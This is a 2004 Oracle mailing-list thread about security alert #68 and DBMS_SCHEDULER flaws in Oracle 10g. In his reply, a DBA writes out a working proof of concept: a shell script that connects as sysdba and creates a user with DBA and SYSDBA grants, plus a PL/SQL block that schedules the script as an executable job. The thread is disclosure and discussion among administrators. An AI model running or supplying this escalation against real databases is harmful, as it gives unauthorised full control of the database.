What annoys me the most is that the bug is so trivial
that it should have been discovered during the beta test.
You and Pete didn't specify how exactly it is possible, probably
out of the goodness of your heart, so I did a little investigation
of my own, and discovered that Oracle10g allows shell scripts to
be scheduled using DBMS_SCHEDULER. Of course, DBMS_SCHEDULER still
uses job queue processes owned by user oracle to schedule those
shell scripts. The thing that can be done is to schedule a shell
script containing the following sequence:
#!/bin/ksh
set -a
echo "Operator, are you pondering what I am pondering?">/dev/console
ORAENV_ASK=NO
ORACLE_SID=<sid>
. /usr/local/bin/oraenv
sqlplus "/ as sysdba"<<EOF
create user brain identified by takeover
default tablespace system;
grant connect,resource,dba to brain;
grant sysdba to brain;
EOF
If this script is executed by a process owned by user "oracle",
"connect / as sysdba" will succeed. The database is mine.
All you need to do is to run something like this:
BEGIN
  DBMS_SCHEDULER.CREATE_PROGRAM (
    program_name   => 'take_over_the_world',
    program_action => '/tmp/pinky_and_the_brain',
    program_type   => 'EXECUTABLE',
    comments       => 'I rulez');
END;
/
and you are ready to create the job and run it. I was astonished
how simple and trivial the flaw is. Someone should have thought of
that during beta testing. Now, let me put on a wide smile and ask:
is that the bug that you and Pete have found?
--
Mladen Gogala
Oracle DBA
email:mladeng@(protected)
Ext: 9787
> -----Original Message-----
> From: Jonathan Gennick [mailto:jonathan@(protected)]
> Sent: Thursday, September 02, 2004 8:33 AM
> To: Pete Finnigan
> Cc: oracle-l@(protected)
> Subject: Re: PeteFinnigan.com Oracle advisory for bugs in
> dbms_scheduler (alert #68)
>
>
> This alert apparently covers several flaws. I'm actually
> taken aback by how long it's taken Oracle to respond to the
> one Pete and I uncovered back in March, which lets you
> leverage the new scheduler to gain access to the Oracle user,
> and thence to grant yourself DBA privileges.
>
> Best regards,
>
> Jonathan Gennick --- Brighten the corner where you are
http://Gennick.com * 906.387.1698 * mailto:jonathan@(protected)
Join the Oracle-article list and receive one
article on Oracle technologies per month by
email. To join, visit
http://five.pairlist.net/mailman/listinfo/oracle-article,
or send email to Oracle-article-request@(protected)
include the word "subscribe" in either the subject or body.
Wednesday, September 1, 2004, 3:06:15 PM, Pete Finnigan
(oracle_list@(protected):
PF> Hi everyone,
PF> Oracle released last night alert #68 covering fixes for many
PF> security bugs in Oracle. PeteFinnigan.com found security bugs in the
PF> new 10gR1 scheduler functionality. Our security advisory can be
PF> found at http://www.petefinnigan.com/alerts.htm
PF> Kind regards
PF> Pete
---
To unsubscribe - mailto:oracle-l-request@(protected)
To read recent messages - http://freelists.org/archives/oracle-l/09-2004